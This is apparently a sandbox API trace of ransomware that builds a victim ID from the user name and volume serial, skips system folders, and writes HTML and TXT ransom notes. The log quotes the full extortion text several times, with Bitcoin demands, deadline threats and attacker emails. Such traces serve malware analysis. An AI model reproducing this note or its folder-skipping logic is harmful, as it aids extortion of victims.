	[0176.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.420] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0176.422] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0176.422] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\temp\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.422] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0176.422] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0176.423] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0176.423] CloseHandle (hObject=0x390) returned 1
	[0176.423] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.423] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.423] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0176.424] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\HELP_DECRYPT_YOUR_FILES.HTML") returned 74
	[0176.424] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\temp\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.424] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0176.424] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0176.427] CloseHandle (hObject=0x390) returned 1
	[0176.428] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.428] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.429] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0176.430] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.430] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\temp\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.430] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0176.431] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.431] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0176.431] CloseHandle (hObject=0x390) returned 1
	[0176.431] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x82afd52b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0176.431] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*") returned 49
	[0176.432] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.433] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*", cchLength=0x31 | out: lpsz="c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*") returned 0x31
	[0176.433] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.433] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*", lpSrch="windows") returned 0x0
	[0176.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.434] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*", lpSrch="boot") returned 0x0
	[0176.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.434] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*", lpSrch="system volume information") returned 0x0
	[0176.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.434] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.435] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\temp\\*.*", lpSrch="temp") returned="temp\\*.*"
	[0176.435] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0176.435] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3847afbf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0
	[0176.435] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0176.435] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0176.436] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8284ec68, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8284ec68, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82874f0d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0176.436] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82828a47, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82828a47, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8284ec68, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0176.436] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82828a47, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82828a47, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8284ec68, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0176.436] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0176.436] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0176.437] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbca7cf5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmsRouter", cAlternateFileName="SMSROU~1")) returned 1
	[0176.437] lstrcmpW (lpString1="SmsRouter", lpString2="..") returned 1
	[0176.437] lstrcmpW (lpString1="SmsRouter", lpString2=".") returned 1
	[0176.437] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0176.437] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0176.437] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="SmsRouter" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter"
	[0176.437] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter"
	[0176.437] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\"
	[0176.437] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\"
	[0176.438] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\*.*") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\*.*"
	[0176.438] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\SmsRouter\\*.*" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbca7cf5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0176.438] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\SmsRouter\\*.*") returned 42
	[0176.438] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.438] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\SmsRouter\\*.*", cchLength=0x2a | out: lpsz="c:\\users\\all users\\microsoft\\smsrouter\\*.*") returned 0x2a
	[0176.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="windows") returned 0x0
	[0176.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="boot") returned 0x0
	[0176.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="system volume information") returned 0x0
	[0176.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="temp") returned 0x0
	[0176.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="program files") returned 0x0
	[0176.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="appdata") returned 0x0
	[0176.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="application data") returned 0x0
	[0176.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="winnt") returned 0x0
	[0176.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="tmp") returned 0x0
	[0176.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="cache") returned 0x0
	[0176.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="webcache") returned 0x0
	[0176.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="inetcache") returned 0x0
	[0176.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="nvidia") returned 0x0
	[0176.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="packages") returned 0x0
	[0176.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.444] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="cookies") returned 0x0
	[0176.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.444] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="programdata") returned 0x0
	[0176.444] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbca7cf5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0176.444] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MessageStore", cAlternateFileName="MESSAG~1")) returned 1
	[0176.444] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MessageStore", cAlternateFileName="MESSAG~1")) returned 0
	[0176.444] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0176.445] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0176.445] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter"
	[0176.445] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\*.*") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\*.*"
	[0176.445] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.445] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.446] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\HELP_DECRYPT_YOUR_FILES.TXT") returned 66
	[0176.446] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\SmsRouter\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0176.446] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0176.446] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18a438, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0) returned 0
	[0176.446] CloseHandle (hObject=0xffffffff) returned 1
	[0176.447] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.447] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.447] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0176.453] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0176.453] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\SmsRouter\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0176.453] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff
	[0176.453] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0176.453] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18b288, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0) returned 0
	[0176.454] CloseHandle (hObject=0xffffffff) returned 1
	[0176.454] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.454] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.454] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0176.454] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\HELP_DECRYPT_YOUR_FILES.HTML") returned 67
	[0176.454] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\SmsRouter\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0176.455] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
